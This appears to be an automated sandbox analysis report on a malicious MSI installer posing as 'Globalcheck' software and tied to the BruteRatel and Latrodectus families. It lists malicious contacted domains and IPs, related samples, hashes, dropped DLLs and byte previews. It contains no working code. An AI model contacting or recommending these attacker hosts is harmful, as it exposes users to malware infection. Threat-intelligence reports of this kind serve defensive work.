https://vutarf.com/Z	rundll32.exe, 00000005.00000002.4141047160.000001E5177D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.thawte.com/repository0W	fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	false		high
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/test/0	explorer.exe, 00000009.00000002.4148681254.0000000009BFE000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/	explorer.exe, 00000009.00000002.4147116004.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/3p	explorer.exe, 00000009.00000003.3468545748.000000000CB32000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com:443/en-us/feed	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of	explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.68.89	dogirafer.com	United States	13335	CLOUDFLARENETUS	true
103.57.249.207	huanvn.com	India	17747	SITINETWORS-IN-APSITINETWORKSLIMITEDIN	true
94.232.43.224	vutarf.com	Russian Federation	44477	WELLWEBNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1567646
Start date and time:	2024-12-03 17:42:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	46
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	fes.msi
Detection:	MAL
Classification:	mal100.spre.bank.troj.spyw.evad.winMSI@69/31@7/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 70 Number of non-executed functions: 332
Cookbook Comments:	Found application associated with file extension: .msi Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: fes.msi

Simulations

Behavior and APIs

Time	Type	Description
11:43:33	API Interceptor	12592318x Sleep call for process: explorer.exe modified
11:45:30	API Interceptor	2x Sleep call for process: WMIC.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.68.89	wait.dll.dll	Get hash	malicious	BruteRatel, Latrodectus	Browse
104.21.68.89	zdi.txt.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse
103.57.249.207	wait.dll.dll	Get hash	malicious	BruteRatel, Latrodectus	Browse
103.57.249.207	zdi.txt.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse
94.232.43.224	wait.dll.dll	Get hash	malicious	BruteRatel, Latrodectus	Browse
	cTgZnuQlDo.exe	Get hash	malicious	SystemBC	Browse
	cTgZnuQlDo.exe	Get hash	malicious	SystemBC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
vutarf.com	wait.dll.dll	Get hash	malicious	BruteRatel, Latrodectus	Browse	94.232.43.224
huanvn.com	wait.dll.dll	Get hash	malicious	BruteRatel, Latrodectus	Browse	103.57.249.207
huanvn.com	zdi.txt.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse	103.57.249.207
bg.microsoft.map.fastly.net	PvsaLvk7xD.exe	Get hash	malicious	FormBook	Browse	199.232.210.172
	Belegdetails Nr378-938-027181-PDF.html	Get hash	malicious	WinSearchAbuse	Browse	199.232.210.172
	4z0JKnfc8L.xlsx	Get hash	malicious	Unknown	Browse	199.232.214.172
	K1_Chit_Form.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	199.232.210.172
	y0FrwmkdQU.exe	Get hash	malicious	GuLoader	Browse	199.232.214.172
	file.exe	Get hash	malicious	LummaC Stealer	Browse	199.232.210.172
	MOaSkQR8WU.xlsx	Get hash	malicious	Unknown	Browse	199.232.210.172
	VVs9SAqm5N.exe	Get hash	malicious	ScreenConnect Tool	Browse	199.232.214.172
	Ref#60031796.exe	Get hash	malicious	AgentTesla	Browse	199.232.214.172
	uC8FY7Hvsx.xls	Get hash	malicious	Unknown	Browse	199.232.214.172
dogirafer.com	wait.dll.dll	Get hash	malicious	BruteRatel, Latrodectus	Browse	104.21.68.89
dogirafer.com	zdi.txt.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse	104.21.68.89

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SITINETWORS-IN-APSITINETWORKSLIMITEDIN	wait.dll.dll	Get hash	malicious	BruteRatel, Latrodectus	Browse	103.57.249.207
	zdi.txt.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse	103.57.249.207
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	202.142.118.100
	na.elf	Get hash	malicious	Gafgyt	Browse	103.225.178.92
	msas.msi	Get hash	malicious	ORPCBackdoor	Browse	103.57.249.42
	msas.msi	Get hash	malicious	ORPCBackdoor	Browse	103.57.249.42
	sstn.exe	Get hash	malicious	Unknown	Browse	103.57.250.204
	sstn.exe	Get hash	malicious	Unknown	Browse	103.57.250.204
	VKkfiTAZXP.elf	Get hash	malicious	Gafgyt, Mirai	Browse	103.225.178.98
	YnO77q8WhV.elf	Get hash	malicious	Unknown	Browse	45.117.200.73
WELLWEBNL	wait.dll.dll	Get hash	malicious	BruteRatel, Latrodectus	Browse	94.232.43.224
	sqx.dll.dll	Get hash	malicious	Unknown	Browse	94.232.40.38
	merd.msi	Get hash	malicious	Unknown	Browse	94.232.40.38
	sqx.dll.dll	Get hash	malicious	Unknown	Browse	94.232.40.38
	mesh.exe	Get hash	malicious	MeshAgent	Browse	94.232.43.185
	mesh.exe	Get hash	malicious	MeshAgent	Browse	94.232.43.185
	Document-19-06-38.js	Get hash	malicious	BruteRatel	Browse	94.232.43.213
	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse	94.232.45.36
	JeZHGKJvrB.exe	Get hash	malicious	Unknown	Browse	94.232.44.144
	hFoVk4DJXG.exe	Get hash	malicious	Unknown	Browse	94.232.44.144
CLOUDFLARENETUS	#Ud83d#Ude0e.pdf	Get hash	malicious	Porn Scam	Browse	172.67.198.207
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	Document-v15-51-07.js	Get hash	malicious	Unknown	Browse	172.67.146.191
	hnskldjf230.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	Document-v15-51-07.js	Get hash	malicious	Unknown	Browse	172.67.146.191
	3GloGaDtsG.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.6
	#Ud83d#Ude0e.pdf	Get hash	malicious	Porn Scam	Browse	104.21.13.77
	http://www.earthcam.net/refer/refer.php?h=1&t=ai&a=MjAyNDEwVExPTQ==&u=http:%2f%2fhidroregjioni-jugor.com%2fdayo/QNMvj/ZGF2aWRidWxsQGFya2ZpbmFuY2lhbC5jb20=	Get hash	malicious	Unknown	Browse	104.16.123.96
	File.exe	Get hash	malicious	Orcus, Xmrig	Browse	104.26.13.205
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.68.89
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.68.89
	4z0JKnfc8L.xlsx	Get hash	malicious	Unknown	Browse	104.21.68.89
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.68.89
	MOaSkQR8WU.xlsx	Get hash	malicious	Unknown	Browse	104.21.68.89
	Ksl3V3pqZq.xls	Get hash	malicious	Unknown	Browse	104.21.68.89
	uC8FY7Hvsx.xls	Get hash	malicious	Unknown	Browse	104.21.68.89
	NEW ORDER #233.xlam.xlsx	Get hash	malicious	Unknown	Browse	104.21.68.89
	EIuz8Bk9kGav2ix.exe	Get hash	malicious	Remcos	Browse	104.21.68.89
	Oder Request &Company profile.xls	Get hash	malicious	Unknown	Browse	104.21.68.89

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Installer\MSI15E9.tmp	zdi.txt.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse
	merd.msi	Get hash	malicious	Unknown	Browse
	medk.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse
	lavi.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse
	Document-v09-42-38.js	Get hash	malicious	BruteRatel	Browse
	Document-v05-53-20.js	Get hash	malicious	BruteRatel, Latrodectus	Browse
	FW3x3p4eZ5.msi	Get hash	malicious	Bazar Loader, BruteRatel	Browse
	Document-19-06-38.js	Get hash	malicious	BruteRatel	Browse
	Document-19-06-38.js	Get hash	malicious	BruteRatel	Browse
	Document-14-33-26.js	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Config.Msi\451511.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	1206
Entropy (8bit):	5.700895426842802
Encrypted:	false
SSDEEP:	24:JOgmr3AyyU6nsOFGNRpULlgIgaFPz9JyeDhiSWr1JIgulgIg+LK:8hr3jansOFGNbUPeeD8SI
MD5:	D7F96145E406BA9B9DF5904AA205B7E1
SHA1:	94387D226F030D46621EFA281650AC26047A85E0
SHA-256:	027AEE66726590D6465DF582C70A96B9B2F0621356E1B3BFE908DD97DC0466EB
SHA-512:	273BBAE049431629F26DF3641429193407691C73C6B80FBD720371E8A8794DAC13C95EA50401A57766B9BD85D1D366F482CFEC950D86F09825D3E4BFECCD9D35
Malicious:	false
Preview:	...@IXOS.@.....@a].Y.@.....@.....@.....@.....@.....@......&.{C0BBEF1E-56B5-4B7D-BEF8-15F4EFC0E044}..Globalcheck..fes.msi.@.....@#....@.....@........&.{C49E1A71-9FF1-45F1-BD5D-A50F7F71232E}.....@.....@.....@.....@.......@.....@.....@.......@......Globalcheck......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{C0BBEF1E-56B5-4B7D-BEF8-15F4EFC0E044}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{C0BBEF1E-56B5-4B7D-BEF8-15F4EFC0E044}.@......&.{602B36A8-BB6A-4A36-906F-F62140AE53DB}&.{C0BBEF1E-56B5-4B7D-BEF8-15F4EFC0E044}.@........CreateFolders..Creating folders..Folder: [1]#.;.C:\Users\user\AppData\Roaming\Globalcheck LLC\Globalcheck\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]....C:\Users\user\AppData\Roaming\....).C:\Users\user\AppData\Roaming\avutil.dll....WriteRegistryValues..Writing system registry values..Key:

C:\Users\user\AppData\Local\Temp\Iwdaeh.tmp

Download File

Process:	C:\Windows\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Owcu.tmp

Download File

Process:	C:\Windows\explorer.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Owcu.tmp-shm

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Tilu.tmp

Download File

Process:	C:\Windows\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\cauc.tmp

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	modified
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\weemec32.tmp

Download File

Process:	C:\Windows\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\avutil.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1752140
Entropy (8bit):	7.305582889398964
Encrypted:	false
SSDEEP:	24576:zbE5t+4+x4D5Z+KFNTsnkN6MFBUp6xdRWxgnsOmYX82Or0t:zbEfH+xIDhNTYCBUURWxgd72e
MD5:	2334A6AEDE2AD2A9004ECD96C872A910
SHA1:	45F7683952A599A607BA6B9B02DACC1586135F22
SHA-256:	C3BAF0446831B6968A30EA23647AC559EE62219F91DAAE5C1B0A9787F9C860B9
SHA-512:	EA6D669F474EA9281B00CF61A436FF59627F0EF19C9C0DF93C641DB0476CA9FEB0763A747E56B5C79B65287CB60628FB60C9E72BD2003BD0B5C270EA11C4FF51
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...A..f..........& ...)....L.......0........................................P......C.8...`... ..........................................E...@..........d....@...@........... ......0....................... ...(....................F...............................text...(...........................`..`.data...............................@....rdata...g.......h..................@..@.pdata...@...@...B... ..............@..@.xdata...O.......P...b..............@..@.bss.....................................edata...E.......F..................@..@.idata.......@......................@....CRT....`....`......................@....tls.........p......................@....rsrc...d...........................@..@.reloc....... ......................@..B.debug.......@..L...................@.../19..................J..............@..B/31.....6)...` ..*..................@..B/45.....

C:\Users\user\NTUSER.DAT.Not

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	100
Entropy (8bit):	5.189624409749109
Encrypted:	false
SSDEEP:	3:BcBqWpNCwlzdRVgjaUyJoy+IYa1LQKwtC1Y:BopNCwpJg2rmfE1owS
MD5:	DA6329B4C63865BB82B745020F73D674
SHA1:	D4E36F1B054D498DC9F489C1462636BE229B472B
SHA-256:	3F10A4EB33DEB90C031800542856E369ADCF94FD36A8A1DB8611FF058DD5C46A
SHA-512:	03D8CAA4629D9D72650E38057E9C91262F17916A6A3828BE74CE9FE54B04F62160E612C5BE40E8A7DE7569ECD937483ED5D43430751A81A9094FAC46B8762052
Malicious:	false
Preview:	{YXZ1dGlsLmRsbA==, IkM6XFVzZXJzXGpvbmVzXEFwcERhdGFcUm9hbWluZ1xhdnV0aWwuZGxsIg==, MQ==, RExMTWFpbg==}

C:\Windows\Installer\45150f.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {C49E1A71-9FF1-45F1-BD5D-A50F7F71232E}, Number of Words: 10, Subject: Globalcheck, Author: Globalcheck LLC, Name of Creating Application: Globalcheck, Template: ;1033, Comments: Database, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	2200576
Entropy (8bit):	7.4656553416380085
Encrypted:	false
SSDEEP:	49152:pXE3YQW8zBQSc0ZnSKBZKumZr7AaIGQ5rr0Go:UYH0Zn3K/AafII
MD5:	371FE9184F46204250BCB30FE62F3A08
SHA1:	490453E5EEAAF89071A29C68548314D1E9B21592
SHA-256:	658B8C47D7193C7C31A2540B2F54FCDFB9298D8346A4AD3BE7E684EF946F57A5
SHA-512:	F06E18A495C8DF1A48DEF116711E7F1452E520BA49585971BDC54D9D6C0E441DE2A490544EDF7E34FD9453C4DE5E67F0E11F0EE45479906B138E6C658DDAC199
Malicious:	false
Preview:	......................>..................."...................................E.......a...............................(...)......+...,...-...........A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...........................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)......1...,...-......./...0...4...2...:...?...5...6...7...8...9...>...<.......=...........@...A...B...C...D...........G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSI15E9.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: zdi.txt.msi, Detection: malicious, Browse Filename: merd.msi, Detection: malicious, Browse Filename: medk.msi, Detection: malicious, Browse Filename: lavi.msi, Detection: malicious, Browse Filename: Document-v09-42-38.js, Detection: malicious, Browse Filename: Document-v05-53-20.js, Detection: malicious, Browse Filename: FW3x3p4eZ5.msi, Detection: malicious, Browse Filename: Document-19-06-38.js, Detection: malicious, Browse Filename: Document-19-06-38.js, Detection: malicious, Browse Filename: Document-14-33-26.js, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI1658.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI1688.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI16A8.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
